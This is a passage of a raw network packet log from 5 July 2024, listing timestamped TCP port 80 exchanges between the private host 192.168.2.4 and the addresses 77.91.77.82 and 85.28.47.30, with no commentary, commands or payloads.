                                                                Jul 5, 2024 04:25:32.674231052 CEST804991277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:32.674242973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:32.674257040 CEST804991277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:32.674263000 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.674274921 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.674274921 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:32.674294949 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.678028107 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.678313017 CEST4991380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.683176994 CEST804991377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:32.683238029 CEST4991380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.683569908 CEST4991380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.683595896 CEST804991277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:32.683640957 CEST4991280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:32.688429117 CEST804991377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:32.891549110 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:32.897521019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.076977968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.076997042 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.077022076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.077040911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.077055931 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.077071905 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.077083111 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.077096939 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.077199936 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.087553978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.087585926 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.087603092 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.087616920 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.087636948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.087651968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.087667942 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.087723970 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.088068008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.088144064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.088165045 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.088174105 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.088181973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.088278055 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159449100 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159468889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159499884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159524918 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159542084 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159559011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159569025 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159584999 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159585953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159600973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159615040 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159616947 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159629107 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159634113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159641981 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159651041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.159662008 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159820080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.159820080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.173540115 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.173556089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.173583984 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.173600912 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.173614025 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.173618078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.173635960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.173644066 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.173661947 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.173965931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.175781012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175800085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175831079 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175846100 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175863028 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175878048 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175890923 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.175904036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175920010 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175931931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.175934076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175952911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175966978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.175990105 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.175992012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.176021099 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.176186085 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.241717100 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.241774082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.241909981 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.241925955 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.241941929 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.241971016 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.241978884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.241993904 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242007971 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242010117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242024899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242041111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242063046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242070913 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242070913 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242079973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242094994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242095947 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242105007 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242114067 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242117882 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242130995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242141008 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242149115 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242177010 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242177010 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242197037 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242213011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242223024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242228985 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242266893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242295980 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.242297888 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.242312908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.243366003 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.256098986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256117105 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256134033 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256151915 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256169081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256181002 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.256213903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256227970 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256242990 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.256253004 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256274939 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256283998 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.256289959 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256304979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256320953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.256334066 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.256349087 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.256500959 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.261761904 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261791945 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261806011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261831999 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261847019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261862040 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.261862040 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261889935 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.261889935 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.261895895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261913061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261923075 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.261926889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261943102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261954069 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.261960030 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261979103 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.261986971 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262600899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262602091 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262619019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262634993 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262653112 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262664080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262669086 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262677908 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262685061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262702942 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262713909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262713909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262717962 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262732029 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262734890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262739897 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262751102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.262765884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262878895 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.262878895 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324249029 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324281931 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324299097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324316025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324332952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324366093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324389935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324393988 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324405909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324421883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324439049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324439049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324449062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324462891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324479103 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324480057 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324505091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324522018 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324548006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324563980 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324579000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324579000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324639082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324651957 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324665070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324665070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324666977 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324682951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324696064 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324696064 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324703932 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324722052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324738026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324753046 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324764013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324776888 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324791908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324819088 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324882030 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324897051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324912071 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.324914932 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324933052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324949026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.324975014 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325079918 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325098038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325104952 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325126886 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325143099 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325158119 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325165987 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325177908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325195074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325206041 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325217962 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325299025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325314045 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325321913 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325334072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325385094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325527906 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.325560093 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.325572968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.327404022 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338363886 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338392019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338407993 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338421106 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338424921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338443041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338459015 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338471889 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338471889 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338550091 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338550091 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338551998 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338582039 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338597059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338613987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338620901 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338713884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338716030 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338738918 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338754892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338771105 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338790894 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338804960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338820934 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338820934 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338848114 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338862896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338874102 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338877916 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338897943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338903904 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338923931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.338929892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.338957071 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.339073896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.339234114 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348261118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348278999 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348306894 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348323107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348335981 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348342896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348361015 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348375082 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348375082 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348380089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348395109 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348408937 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348409891 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348424911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348434925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348442078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348452091 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348459005 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348468065 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348475933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.348500967 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348500967 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.348613024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349070072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349083900 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349131107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349220991 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349221945 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349239111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349271059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349286079 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349311113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349325895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349339008 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349339008 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349342108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349349022 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349359035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349368095 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349435091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349448919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349464893 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349464893 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349704981 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349733114 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349750996 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349766016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349781036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349805117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349821091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349833965 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349857092 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349874020 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349890947 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349906921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349919081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349919081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349951029 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349966049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.349978924 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.349981070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.350032091 CEST804990385.28.47.30192.168.2.4
